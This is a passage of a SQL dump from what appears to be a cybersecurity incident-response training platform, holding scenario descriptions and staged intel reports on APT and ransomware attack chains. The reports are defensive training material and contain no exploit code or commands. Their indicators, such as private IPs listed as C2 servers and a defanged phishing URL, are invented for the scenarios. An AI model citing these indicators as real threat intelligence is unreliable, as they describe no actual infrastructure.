(56, 'Operation Credit Bureau', 'Chinese State-Sponsored (Unattributed)', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'In 2017, Equifax faced a catastrophic data breach, exposing 147 million Americans\' personal data. This scenario immerses you in the incident response team tasked with analyzing and mitigating the attack. You will navigate through the exploitation of Apache Struts vulnerability CVE-2017-5638, uncover the undetected dwell time, and understand the persistence mechanisms employed by a Chinese state-sponsored APT group.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Equifax breach\\\",\\\"Apache Struts\\\",\\\"CVE-2017-5638\\\",\\\"cybersecurity training\\\",\\\"APT\\\"]\"', '', 10, '2026-01-08 22:03:35', 'Operation Breach Analysis: Equifax 2017 Incident Response Training', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'operation-credit-bureau', 1),
(57, 'Operation Log4Chaos', 'Multiple (Chinese APTs, Ransomware Groups)', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'In late 2021, a critical vulnerability known as Log4Shell (CVE-2021-44228) began affecting millions of Java applications worldwide. As organizations scrambled to patch, Chinese APTs and ransomware groups initiated a mass exploitation campaign. Trainees will navigate through the chaotic landscape, analyzing JNDI injection payloads and cryptominer deployments while racing against time to defend critical systems.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Log4Shell\\\",\\\"APT\\\",\\\"Ransomware\\\",\\\"Cybersecurity Training\\\",\\\"JNDI Injection\\\"]\"', '', 5, '2026-01-08 22:08:03', 'Operation Log4Shell: APT and Ransomware Exploit Race', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'operation-log4chaos', 1),
(58, 'Operation MOVEit Mayhem', 'Cl0p (TA505)', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'In this scenario, the notorious Cl0p group has discovered a zero-day vulnerability in the widely-used MOVEit file transfer platform. As organizations worldwide unknowingly expose sensitive data due to an SQL injection flaw, Cl0p orchestrates an unprecedented mass data theft. Uniquely, the group opts for a strategic extortion model, choosing not to deploy ransomware encryptors, challenging security teams to respond without the typical encryption-based clues.', 'intermediate', 0, 1, 0, 60, NULL, '\"[\\\"Cl0p\\\",\\\"Zero-Day Exploitation\\\",\\\"SQL Injection\\\",\\\"MOVEit Platform\\\",\\\"Cyber Extortion\\\"]\"', '', 5, '2026-01-08 22:11:08', 'Cl0p\'s Zero-Day Exploitation of MOVEit: A Cybersecurity Training Scenario', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'operation-moveit-mayhem', 1),
(59, 'Operation Exchange Exploit: APTs and Ransomware', 'Multiple (Hafnium, LockBit, Conti)', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'In early 2021, Microsoft Exchange servers worldwide became prime targets due to critical vulnerabilities. These security gaps were rapidly weaponized by both state-sponsored APT groups like Hafnium and financially-motivated ransomware operators such as LockBit and Conti. Trainees will investigate the exploitation chain, from initial access to data exfiltration, understanding the threat landscape\'s complexity.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Microsoft Exchange vulnerabilities\",\"APT groups\",\"ransomware\",\"cybersecurity training\",\"web shell\"]', NULL, 5, '2026-01-08 22:14:11', 'Operation Exchange Exploit: APTs and Ransomware', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'operation-proxyshell', 1);

-- --------------------------------------------------------

--
-- Table structure for table `operation_alerts`
--

DROP TABLE IF EXISTS `operation_alerts`;
CREATE TABLE `operation_alerts` (
  `id` int(11) NOT NULL,
  `operation_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `sequence_order` int(11) NOT NULL,
  `intel_report_title` varchar(255) DEFAULT NULL,
  `intel_report_content` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `operation_alerts`
--

INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(1, 1, 268, 1, 'Investigative Report: Phishing Email Analysis', '### Overview\nThe initial alert in Operation Dark Current has detected a phishing email targeting employees at the power facility. The email contained a malicious attachment disguised as a routine internal document.\n\n### Findings\n- **Sender:** The email originated from a compromised external account known for past association with the Sandworm APT group.\n- **Attachment:** An Excel file with embedded macros designed to execute upon opening.\n- **Targets:** Key personnel within the corporate IT network.\n\n### Next Steps\nThis incident indicates the potential for malware deployment. Increased scrutiny on email attachments and network traffic is advised as the next phase of the attack may involve malware execution.', '2025-12-31 13:10:04'),
(2, 1, 269, 2, 'Malware Analysis: BlackEnergy Deployment', '### Overview\nFollowing the phishing incident, BlackEnergy malware has been executed within the corporate IT network. Analysis of this malware is crucial to understanding the attack vector and preventing further incidents.\n\n### Findings\n- **Functionality:** BlackEnergy is a versatile malware capable of launching DDoS attacks, stealing credentials, and deploying additional payloads.\n- **Indicators of Compromise:** Network traffic to known malicious IPs and unusual process creation on infected systems.\n\n### Next Steps\nDetection of persistence mechanisms is critical. Efforts should be focused on identifying registry changes or scheduled tasks that suggest the establishment of persistence within the network.', '2025-12-31 13:10:04'),
(3, 1, 270, 3, 'Persistence Mechanism Identified', '### Overview\nInvestigation reveals that the attackers have established persistence within the corporate IT environment, allowing them to maintain access even after system reboots.\n\n### Findings\n- **Techniques Used:** Modification of startup scripts and registry keys; scheduled tasks pointing to malicious scripts.\n- **Affected Systems:** Several key servers and workstations exhibit signs of compromise.\n\n### Next Steps\nAttention should now shift towards detecting and preventing lateral movement towards the Operational Technology (OT) network, as this is a likely next step for the attackers.', '2025-12-31 13:10:04'),
(4, 1, 271, 4, 'Lateral Movement Detected: OT Network Breach', '### Overview\nThe attackers have successfully moved laterally from the corporate IT network into the OT network, a critical phase in compromising the power grid\'s infrastructure.\n\n### Findings\n- **Methods:** Use of stolen credentials and exploitation of trusted connections between IT and OT networks.\n- **Compromised Components:** Initial access to the OT network has been confirmed on systems managing SCADA operations.\n\n### Next Steps\nImmediate action is required to contain and mitigate any potential SCADA system compromise. Focus should be on isolating affected systems and monitoring for execution attempts within the SCADA environment.', '2025-12-31 13:10:04'),
(5, 1, 272, 5, NULL, NULL, '2025-12-31 13:10:04'),
(6, 2, 274, 1, NULL, NULL, '2025-12-31 13:43:07'),
(7, 2, 275, 2, 'Analysis of Malicious Code Execution on Developer Systems', '# Malicious Code Execution on Developer Systems\n\n## Context\nFollowing the phishing attempts through weaponized job offers, the adversary has successfully executed malicious code on the targeted developer systems. This report analyzes the initial compromise and provides insights into the malware tactics used.\n\n## Key Findings\n- **Delivery Method**: The phishing emails contained attachments disguised as job descriptions, which, once opened, executed a macro to download a secondary payload.\n- **Payload Details**: The malware used is a variant of the Lazarus Group’s known toolkit, designed to evade traditional antivirus solutions and persist within compromised systems.\n- **Immediate Impact**: Initial indicators suggest that the malware is harvesting credentials and establishing communication with command-and-control (C2) servers.\n\n## Recommendations\n- **Immediate Actions**: Isolate affected systems and perform a full forensic analysis to identify all compromised endpoints.\n- **Preventive Measures**: Conduct security awareness training focusing on phishing detection and enforce strict email attachment policies.', '2025-12-31 13:43:07'),
(8, 2, 276, 3, 'Establishing Persistence and Lateral Movement within the Network', '# Establishing Persistence and Lateral Movement\n\n## Context\nPost-malicious code execution, the adversary is moving laterally within the network, aiming to establish persistence across multiple systems. This report delves into the techniques used by the Lazarus Group for lateral movement and persistence.\n\n## Key Findings\n- **Techniques Used**: The attackers are leveraging compromised credentials and exploiting existing vulnerabilities to move laterally within the organization’s network.\n- **Persistence Mechanisms**: The group is using scheduled tasks and registry modifications to maintain access to compromised systems.\n- **Targeted Assets**: Key systems identified include cryptocurrency wallets and financial transaction servers.\n\n## Recommendations\n- **Network Segmentation**: Strengthen network segmentation to limit lateral movement.\n- **Monitoring and Detection**: Implement enhanced monitoring for unusual login activities and unauthorized access attempts.', '2025-12-31 13:43:07'),
(9, 2, 277, 4, 'Cryptocurrency Exfiltration Tactics and Laundering Channels', '# Cryptocurrency Exfiltration and Laundering\n\n## Context\nWith persistence established, the Lazarus Group is actively exfiltrating cryptocurrency assets, utilizing complex laundering channels to obfuscate the funds\' origins. This report provides insights into the exfiltration processes and laundering mechanisms employed.\n\n## Key Findings\n- **Exfiltration Process**: The attackers are using custom scripts to automate the transfer of cryptocurrency from compromised wallets to intermediary accounts.\n- **Laundering Channels**: Funds are being funneled through a series of mixer services and exchanged across multiple cryptocurrency platforms to obscure the trail.\n- **Evasion Tactics**: The group employs rapid transfer sequences and leverages decentralized exchanges to minimize traceability.\n\n## Recommendations\n- **Transaction Monitoring**: Enhance transaction monitoring to identify unusual patterns and large transfers out of normal business hours.\n- **Collaboration with Exchanges**: Work closely with cryptocurrency exchanges and financial institutions to flag and freeze suspicious transactions.', '2025-12-31 13:43:07'),
(10, 3, 278, 1, 'Analysis of Malicious Code Execution', '### Background\nFollowing the detection of a compromised update package, forensic analysis has confirmed the execution of malicious code on affected systems. This report delves into the mechanisms employed by APT41 to activate their payload upon deployment of the infected update.\n\n### Key Findings\n- **Initial Execution**: The malicious DLL is designed to execute upon the initialization of the server management software.\n- **Obfuscation Techniques**: APT41 has employed advanced obfuscation techniques to avoid detection by traditional antivirus software.\n- **Payload Functionality**: The primary functions include system reconnaissance and the establishment of backdoor access for further exploitation.\n\n### Next Steps\nMitigation should focus on the identification and isolation of compromised hosts. Enhanced monitoring for unusual system activity is recommended to detect further malicious behavior.', '2025-12-31 13:45:44'),
(11, 3, 279, 2, 'Persistence Mechanisms and Countermeasures', '### Overview\nAPT41 has been observed establishing persistence on compromised systems following the execution of their payload. This report outlines the persistence techniques used and suggests countermeasures to neutralize this threat.\n\n### Persistence Techniques\n- **Registry Modifications**: Alterations to the Windows Registry to ensure the malware runs on system startup.\n- **Scheduled Tasks**: Creation of scheduled tasks to execute malware at specified intervals.\n\n### Recommended Countermeasures\n- **Registry Auditing**: Regular audits of the registry for unauthorized changes.\n- **Task Scheduler Monitoring**: Implement alerts for the creation of new scheduled tasks.\n\n### Conclusion\nNeutralizing persistence is critical to prevent further exploitation and lateral movement within the network.', '2025-12-31 13:45:44'),
(12, 3, 280, 3, 'Lateral Movement and Data Exfiltration Insights', '### Incident Summary\nPost-establishment of persistence, APT41 has initiated lateral movement to expand its foothold within the network and commenced data exfiltration activities. This report provides insights into these operations and their implications.\n\n### Lateral Movement Tactics\n- **Credential Dumping**: Use of tools to extract login credentials from compromised systems.\n- **Remote Services**: Exploitation of remote desktop and SMB services for network traversal.\n\n### Data Exfiltration\n- **Command and Control (C2) Channels**: Data is being exfiltrated using encrypted C2 channels to evade detection.\n- **Volume and Target Data**: Focus on intellectual property and financial records.\n\n### Recommendations\n- **Network Segmentation**: Implement stringent network segmentation to contain the spread.\n- **Data Loss Prevention (DLP)**: Deploy DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nProactive measures are essential to detect and thwart further lateral movement and data theft by the adversary.', '2025-12-31 13:45:44'),
(13, 3, 281, 4, NULL, NULL, '2025-12-31 13:45:44'),
(14, 4, 285, 1, 'Analysis of Malicious Domain Infrastructure', '### Overview\nFollowing the detection of a spear-phishing email campaign targeting political organizations, further analysis has led to the identification of a network of malicious domains. These domains are linked to APT28\'s credential harvesting activities.\n\n### Findings\n- **Domain Patterns:** The domains employ similar naming conventions, often mimicking legitimate services to deceive targets.\n- **Hosting and IP Details:** The infrastructure is hosted across several countries, complicating attribution and takedown efforts.\n- **SSL/TLS Certificates:** Many domains utilize Let\'s Encrypt certificates, providing a false sense of security.\n\n### Recommendations\n- **Monitoring and Blocking:** Implement domain monitoring for known malicious patterns and block identified domains at the network level.\n- **User Education:** Enhance awareness training focused on recognizing phishing attempts related to these domains.', '2025-12-31 15:17:10'),
(15, 4, 286, 2, 'Investigation into OAuth Token Abuse', '### Overview\nSubsequent to the discovery of malicious domains, evidence of OAuth token abuse has been detected. This technique is being used to maintain persistent access to compromised accounts within targeted organizations.\n\n### Findings\n- **Scope of Abuse:** Multiple accounts within political organizations have been accessed using OAuth tokens, bypassing traditional authentication.\n- **Attack Vectors:** Tokens are likely being obtained through previously identified spear-phishing campaigns.\n- **Impact:** Abused tokens allow threat actors to conduct operations with legitimate access, making detection difficult.\n\n### Recommendations\n- **Token Revocation:** Immediate revocation of suspicious OAuth tokens is critical.\n- **Enhanced Monitoring:** Deploy advanced monitoring to detect anomalous token usage patterns.\n- **User Awareness:** Educate users on the risks of OAuth token misuse and encourage cautious application authorization.', '2025-12-31 15:17:10'),
(16, 4, 287, 3, 'Disinformation Campaign Planning Insights', '### Overview\nIntelligence has surfaced regarding the planning of a disinformation campaign by APT28, aimed at influencing public perception during the national election period.\n\n### Findings\n- **Tactics and Channels:** The campaign plans to utilize social media platforms and fake news websites to disseminate false narratives.\n- **Target Audience:** Efforts are focused on swaying undecided voters and amplifying societal divisions.\n- **Coordination:** Activities appear to be coordinated with other malicious operations, potentially leveraging stolen credentials and OAuth access.\n\n### Recommendations\n- **Collaboration:** Work with social media companies to identify and remove fake accounts and content.\n- **Public Awareness:** Launch public awareness initiatives to educate voters on identifying disinformation.\n- **Intel Sharing:** Foster information sharing among national and international partners to enhance detection and response efforts.', '2025-12-31 15:17:10'),
(17, 4, 288, 4, NULL, NULL, '2025-12-31 15:17:10'),
(18, 5, 289, 1, 'Analysis of Phishing Email Attack Vector', '### Overview\nThe phishing email was identified as the initial attack vector used by the Wizard Spider APT group. The email, disguised as an urgent communication from a trusted medical supplier, contained a malicious link to a counterfeit login page.\n\n### Technical Details\n- **Sender Email Address**: spoofed@trustedmedical.com\n- **Subject Line**: \'Immediate Action Required: Update Your Credentials\'\n- **Date/Time Detected**: 2023-10-15 09:45 UTC\n- **Malicious URL**: hxxp://update-credentials[.]secure-med[.]com\n\n### Next Steps\nThe detection of this phishing email suggests the potential for further malicious activity. Vigilance is advised for indicators of TrickBot malware, commonly used by Wizard Spider after initial entry.', '2025-12-31 15:22:50'),
(19, 5, 290, 2, 'TrickBot Malware Execution Analysis', '### Overview\nTrickBot malware was executed following the successful phishing attack, marking the transition from initial access to establishing a foothold within the hospital network.\n\n### Technical Details\n- **Malware Type**: TrickBot variant\n- **Execution Path**: C:\\\\Users\\\\Public\\\\updater.exe\n- **Date/Time Detected**: 2023-10-15 10:15 UTC\n- **Command and Control (C2) Server**: 192.168.1.100\n\n### Persistence Mechanisms\nThe malware is known to deploy persistence mechanisms to maintain access. Monitoring for scheduled tasks or registry changes is crucial as we anticipate these activities to follow.', '2025-12-31 15:22:50'),
(20, 5, 291, 3, 'Persistence Mechanism Identification', '### Overview\nPersistence mechanisms were identified, confirming the adversary\'s intent to maintain long-term access to the hospital\'s network.\n\n### Technical Details\n- **Registry Key Modification**: HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\n- **Scheduled Task Created**: \'SystemUpdater\' running updater.exe\n- **Date/Time Detected**: 2023-10-15 11:00 UTC\n\n### Indicator of Lateral Movement\nThe presence of persistence mechanisms suggests the next likely phase is lateral movement. Cobalt Strike, a common tool for such activities, should be anticipated.', '2025-12-31 15:22:50'),
(21, 5, 292, 4, 'Cobalt Strike Beacon Detection', '### Overview\nA Cobalt Strike beacon was detected, indicating the adversary\'s progression to lateral movement within the network.\n\n### Technical Details\n- **Beacon IP Address**: 192.168.1.101\n- **Beacon Port**: 4444\n- **Date/Time Detected**: 2023-10-15 11:45 UTC\n- **Communication Method**: HTTPS\n\n### Implications\nThis activity signifies an imminent threat of ransomware deployment. Immediate action is required to isolate affected systems and prevent the final stage of ransomware encryption.', '2025-12-31 15:22:50'),
(22, 5, 293, 5, NULL, NULL, '2025-12-31 15:22:50'),
(23, 6, 294, 1, 'Report: Analysis of Initial Access via Spear Phishing Campaign', '### Overview\nThe spear phishing campaign executed by the Carbanak/FIN7 group was highly targeted, focusing on banking personnel with access to critical systems. The phishing emails were crafted to appear as legitimate internal communications, increasing the probability of successful compromise.\n\n### Key Indicators\n- **Email Subject:** \'Urgent Security Update Required\'\n- **Sender Domain:** spoofed from `security-update@bankinginternal.com`\n- **Attachment:** Malicious XLS file named `Security_Update.xls`\n\n### Next Steps\nThe next phase involves deploying malware to harvest credentials. It is critical to monitor for anomalies in user behavior and system access patterns to mitigate further compromise.', '2025-12-31 15:23:56'),
(24, 6, 295, 2, 'Report: Malware Execution and Credential Harvesting Analysis', '### Overview\nFollowing the initial spear phishing attack, the Carbanak/FIN7 group deployed a sophisticated malware payload. This malware is designed to execute stealthily and harvest credentials from compromised systems.\n\n### Malware Characteristics\n- **Type:** Remote Access Trojan (RAT)\n- **Capabilities:** Keylogging, screen capture, credential dumping\n- **Persistence Mechanism:** Scheduled Tasks and Registry modifications\n\n### Next Steps\nAttention should be directed towards detecting and isolating instances of lateral movement within the network. Implement robust network segmentation and monitor for unauthorized access attempts to critical systems.', '2025-12-31 15:23:56'),
(25, 6, 296, 3, 'Report: Lateral Movement and Network Exploitation Techniques', '### Overview\nCarbanak/FIN7 have initiated lateral movement across the network, leveraging harvested credentials to escalate privileges and access sensitive systems.\n\n### Techniques Observed\n- **Credential Reuse:** Exploiting weak password policies\n- **Pass-the-Hash:** Utilizing NTLM hashes to authenticate\n- **Exploitation of Vulnerable Services:** Targeting unpatched systems for entry\n\n### Next Steps\nThe final stage involves manipulation of ATM withdrawal limits and exploitation of SWIFT gateways. Enhance monitoring of financial transaction systems and initiate real-time alerts for unusual transaction patterns.', '2025-12-31 15:23:56'),
(26, 6, 297, 4, NULL, NULL, '2025-12-31 15:23:56'),
(27, 7, 304, 1, 'Analysis of Spear Phishing Email Detected', '## Overview\nThe initial spear phishing email was detected targeting key personnel within the IT department of the multinational energy corporation. The email contained a malicious attachment disguised as a financial report.\n\n## Details\n- **Sender**: An email address mimicking a known supplier.\n- **Subject Line**: \'Urgent: Q3 Financial Summary Required\'\n- **Attachment**: A macro-enabled Excel file designed to execute a PowerShell script upon opening.\n\n## Next Steps\nMonitoring for any execution of scripts related to this email is crucial to prevent further compromise. Pay special attention to any PowerShell activities that may be triggered as a result of this email.', '2026-01-02 04:27:59'),
(28, 7, 305, 2, 'Investigation into Suspicious PowerShell Execution', '## Overview\nFollowing the detection of the spear phishing email, a suspicious PowerShell script execution was identified on the workstation of a targeted employee.\n\n## Details\n- **Script Purpose**: The PowerShell script was designed to establish a remote connection with command-and-control (C2) servers operated by APT34.\n- **Indicators**: Execution logs show obfuscation techniques to evade detection.\n\n## Insights\nThis execution suggests the attackers are attempting to gain a foothold within the network. Immediate measures should be taken to isolate the affected system and prevent the establishment of persistence mechanisms.', '2026-01-02 04:27:59'),
(29, 7, 306, 3, 'Identification of Persistence Mechanism Established', '## Overview\nAPT34 has successfully established a persistence mechanism within the compromised systems, leveraging scheduled tasks for recurring execution of malicious scripts.\n\n## Details\n- **Technique**: Creation of scheduled tasks to execute scripts at regular intervals.\n- **Tools Used**: Commonly used Windows utilities to create and modify tasks.\n\n## Strategic Implications\nThe persistence indicates a strategic intention to maintain long-term access. This necessitates a thorough review of scheduled tasks across all systems to pinpoint and neutralize unauthorized entries.', '2026-01-02 04:27:59'),
(30, 7, 307, 4, 'Detection of Unauthorized Lateral Movement', '## Overview\nAnomalous activity indicating unauthorized lateral movement within the corporate network was detected, suggesting the attackers are expanding their access.\n\n## Details\n- **Method**: Use of stolen credentials to access additional systems.\n- **Targets**: Systems containing sensitive geological data.\n\n## Recommendations\nStrengthen monitoring of privileged accounts and implement network segmentation to hinder further lateral movement. It\'s critical to review access logs to understand the attack path and prevent data exfiltration attempts.', '2026-01-02 04:27:59'),
(31, 7, 308, 5, NULL, NULL, '2026-01-02 04:27:59'),
(32, 8, 319, 1, 'Phishing Email Analysis', '### Overview\nThe initial alert identified a **suspicious email** likely associated with a phishing attempt. This is often the first step in APT10\'s strategy to deliver malicious payloads.\n\n### Detailed Analysis\n- **Sender\'s Email:** The email originated from a domain resembling a known vendor, indicating a possible **spear-phishing** attempt.\n- **Content:** The email contained a link to a compromised website designed to harvest credentials.\n- **Attachment:** A malicious document file was attached, likely containing a macro to execute malware upon opening.\n\n### Next Steps\n- **Containment:** Block the sender\'s domain and similar variants.\n- **Awareness:** Educate employees on identifying phishing attempts.\n- **Monitoring:** Increase surveillance on network activities for any unauthorized application executions, which could indicate successful malware deployment.', '2026-01-02 20:23:41'),
(33, 8, 320, 2, 'Malware Execution Insight', '### Overview\nFollowing the phishing incident, an alert was triggered for **unauthorized application execution**. This suggests that the malware embedded in the phishing email has been activated.\n\n### Detailed Analysis\n- **Execution Path:** The malware was executed from a temporary directory, consistent with initial payload delivery tactics.\n- **Detection:** Antivirus logs show the execution of a file named `loader.exe`, indicative of a dropper or loader.\n- **Behavior:** The malware attempts to establish a connection with a known C2 server used by APT10.\n\n### Next Steps\n- **Containment:** Isolate the affected system to prevent further spread.\n- **Forensics:** Capture memory and disk images for analysis.\n- **Monitoring:** Watch for attempts to establish persistence mechanisms, which could solidify the presence of the threat.', '2026-01-02 20:23:41'),
(34, 8, 321, 3, 'Persistence Mechanism Investigation', '### Overview\nThe detection of a **persistence mechanism** indicates that the attackers are attempting to maintain access to the compromised system.\n\n### Detailed Analysis\n- **Registry Changes:** The malware modified registry keys to ensure execution upon startup.\n- **Scheduled Tasks:** A new scheduled task was created to execute the malware at regular intervals.\n- **Service Installation:** A new service, disguised as a legitimate application, was installed to run the malware.\n\n### Next Steps\n- **Containment:** Disable the scheduled tasks and services related to the malware.\n- **Forensics:** Analyze registry changes to understand the full scope.\n- **Monitoring:** Prepare for potential lateral movement attempts, as attackers may try to extend control over the network.', '2026-01-02 20:23:41'),
(35, 8, 322, 4, 'Lateral Movement Analysis', '### Overview\nThe alert for **lateral movement** suggests that APT10 is attempting to expand its foothold within the network.\n\n### Detailed Analysis\n- **Tools Used:** The attackers utilized tools such as `PsExec` and `WMI` to move laterally.\n- **Compromised Accounts:** Credentials from privileged accounts were used, indicating possible credential dumping.\n- **Targets:** Lateral movement attempts were detected towards servers hosting critical data.\n\n### Next Steps\n- **Containment:** Reset passwords for compromised accounts and enhance MFA enforcement.\n- **Forensics:** Conduct a thorough audit of account activities and access logs.\n- **Monitoring:** Be vigilant for data exfiltration attempts, as the attackers might next attempt to extract sensitive information.', '2026-01-02 20:23:41'),
(36, 8, 323, 5, NULL, NULL, '2026-01-02 20:23:41'),
(37, 9, 324, 1, NULL, NULL, '2026-01-02 20:29:44'),
(38, 9, 325, 2, 'Analysis of Malicious Firmware Update', '### Executive Summary\nAfter detecting suspicious network traffic suggesting initial access, a detailed analysis of the firmware update process revealed an unauthorized update to the firewall\'s SPI flash memory.\n\n### Technical Details\n- **Firmware Image**: The firmware image checksum did not match the expected value, indicating tampering.\n- **Analysis Tools**: Utilized Binwalk and Firmware Mod Kit to dissect the firmware.\n- **Findings**: Embedded payload designed for remote command execution.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been established through this malicious firmware.', '2026-01-02 20:29:44'),
(39, 9, 326, 3, 'Investigation of Persistence Mechanism', '### Executive Summary\nA persistence mechanism was detected, ensuring the malicious firmware\'s survival across reboots.\n\n### Technical Details\n- **Method**: The implant modified bootloader scripts to reload the malicious payload.\n- **Detection Tools**: Compared bootloader script with known good configurations.\n\n### Next Steps\nMonitoring for signs of lateral movement within the network.', '2026-01-02 20:29:44'),
(40, 9, 327, 4, 'Signs of Lateral Movement within Network', '### Executive Summary\nThe compromised firewall is being used as a pivot point for lateral movement within the network.\n\n### Technical Details\n- **Indicators of Compromise (IoCs)**: Multiple unusual authentication attempts logged.\n- **Network Zones Affected**: Activity detected in the DMZ and internal subnet.\n\n### Next Steps\nEstablish containment measures to prevent further spread and identify C2 communication channels.', '2026-01-02 20:29:44'),
(41, 9, 328, 5, 'Command and Control Channel Analysis', '### Executive Summary\nA command and control channel has been established, facilitating remote administration of the compromised system.\n\n### Technical Details\n- **C2 Protocol**: Detected use of DNS tunneling for stealthy communication.\n- **Frequency**: Regular beaconing every 5 minutes.\n\n### Next Steps\nImplement measures to block C2 communication and monitor for data exfiltration attempts.', '2026-01-02 20:29:44'),
(42, 9, 329, 6, 'Detection of Data Exfiltration Attempt', '### Executive Summary\nA data exfiltration attempt was intercepted, aimed at extracting sensitive information from the network.\n\n### Technical Details\n- **Method**: Data packaged in compressed archives, sent over HTTPS.\n- **Volume**: Approximately 500MB of data targeted.\n\n### Next Steps\nInvestigate for signs of privilege escalation that may have facilitated the exfiltration.', '2026-01-02 20:29:44'),
(43, 9, 330, 7, 'Privilege Escalation Analysis', '### Executive Summary\nPrivilege escalation attempts have been detected, likely to gain higher-level access for further exploitation.\n\n### Technical Details\n- **Vector**: Exploitation of known vulnerability in outdated software.\n- **Detection**: Log analysis showed unauthorized changes to system files and configurations.\n\n### Next Steps\nExamine logs and configurations for attempts to cover tracks and evade defenses.', '2026-01-02 20:29:44'),
(44, 9, 331, 8, 'Defense Evasion Tactics Observed', '### Executive Summary\nAttempts to cover tracks and evade defense mechanisms were observed following privilege escalation.\n\n### Technical Details\n- **Tactics**: Deletion of log files, disabling of security tools.\n- **Detection Tools**: Anomaly detection in SIEM highlighted these activities.\n\n### Next Steps\nConduct internal reconnaissance to determine the target assets and finalize response strategies.', '2026-01-02 20:29:44'),
(45, 9, 332, 9, 'Internal Reconnaissance Activities', '### Executive Summary\nInternal reconnaissance activities have been detected, indicating preparation for final data extraction.\n\n### Technical Details\n- **Techniques Used**: Network scanning and mapping of critical systems.\n- **Tools Detected**: Use of custom scripts mimicking legitimate admin tools.\n\n### Next Steps\nPrepare for potential final data extraction and reinforce monitoring on critical assets.', '2026-01-02 20:29:44'),
(46, 9, 333, 10, 'Final Data Extraction Attempt Analysis', '### Executive Summary\nA final data extraction attempt was detected, marking the culmination of the attack chain.\n\n### Technical Details\n- **Targeted Data**: High-value intellectual property and customer data.\n- **Method**: Attempted exfiltration via cloud-based storage services.\n\n### Conclusion\nThe attack cycle is complete. Immediate containment and remediation actions should be prioritized to prevent future breaches.', '2026-01-02 20:29:44'),
(47, 10, 334, 1, 'Analysis of Obfuscated JavaScript Payload', '### Overview\nFollowing the detection of the compromised website, analysts have identified a suspicious JavaScript payload designed to execute upon a user\'s visit. This script is heavily obfuscated, suggesting advanced techniques employed by APT32 to avoid detection.\n\n### Observations\n- **Obfuscation Techniques:** The script uses multiple layers of encoding and dynamic code generation.\n- **Execution Trigger:** The payload is triggered when specific conditions are met, such as user agent matching and referrer checks.\n\n### Recommendations\n- **Immediate Action:** Set up sandbox environments to safely deobfuscate and analyze the script.\n- **Further Investigation:** Monitor network traffic for any anomalous patterns indicative of further payload execution.', '2026-01-02 20:31:37'),
(48, 10, 335, 2, 'Custom Backdoor Analysis', '### Overview\nUpon successful execution of the obfuscated JavaScript, a custom backdoor is installed on macOS systems. This backdoor is unique to APT32 and provides persistent access to infected devices.\n\n### Key Features\n- **Persistence Mechanism:** The backdoor uses Launch Daemons for persistence, ensuring it runs at startup.\n- **Capabilities:** Allows remote access, file manipulation, and execution of arbitrary commands.\n\n### Recommendations\n- **Detection:** Implement host-based rules to detect known persistence techniques used by this backdoor.\n- **Mitigation:** Advise users to update macOS and employ endpoint protection solutions.', '2026-01-02 20:31:37'),
(49, 10, 336, 3, 'Command and Control Communication Analysis', '### Overview\nThe custom backdoor begins communicating with a Command and Control (C2) server once installed. This stage marks the lateral movement phase, where the attacker maintains control over the compromised devices.\n\n### Observations\n- **C2 Channels:** Utilizes HTTPS for encrypted communication, making detection challenging.\n- **Behavioral Patterns:** Regular check-ins with the server and potential data upload activity.\n\n### Recommendations\n- **Network Monitoring:** Deploy advanced monitoring to identify atypical HTTPS traffic patterns.\n- **Threat Intelligence:** Leverage threat intelligence feeds to flag known APT32 infrastructure.', '2026-01-02 20:31:37'),
(50, 10, 337, 4, 'Data Exfiltration Attempt Detected', '### Overview\nThe final stage of the attack involves attempts to exfiltrate sensitive data from the compromised organization. This represents a significant threat to the confidentiality of human rights advocacy efforts.\n\n### Observations\n- **Exfiltration Tactics:** Use of compressed archives sent over encrypted channels.\n- **Data Types Targeted:** Email communications, internal documents, and contact databases.\n\n### Recommendations\n- **Data Loss Prevention (DLP):** Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response:** Engage incident response teams to contain and mitigate the impact of exfiltration attempts.', '2026-01-02 20:31:37'),
(51, 10, 338, 5, NULL, NULL, '2026-01-02 20:31:37'),
(52, 11, 339, 1, 'Web Shell Deployment Detected', '### Overview\nFollowing the initial access via ProxyLogon Zero-Day exploit, our systems have identified the deployment of a web shell, specifically **China Chopper**.\n\n### Details\n- **Web Shell Name**: China Chopper\n- **Behavior**: Provides attackers with remote access and control over the compromised server.\n- **Indicators of Compromise (IoCs)**: Presence of unusual web application files.\n\n### Next Steps\nFocus on identifying the source of the web shell and potential attackers. Prepare for potential credential theft attempts, which are commonly executed following web shell deployment.', '2026-01-03 00:04:00'),
(53, 11, 340, 2, 'Credential Harvesting Detected', '### Overview\nAfter the deployment of China Chopper, there are signs of credential harvesting using **Mimikatz**.\n\n### Details\n- **Tool Used**: Mimikatz\n- **Purpose**: Extracting user credentials from the compromised system.\n- **Indicators**: Unauthorized access attempts, suspicious processes running on the server.\n\n### Next Steps\nMonitor for lateral movement attempts within the network, as attackers may use harvested credentials to propagate.', '2026-01-03 00:04:00'),
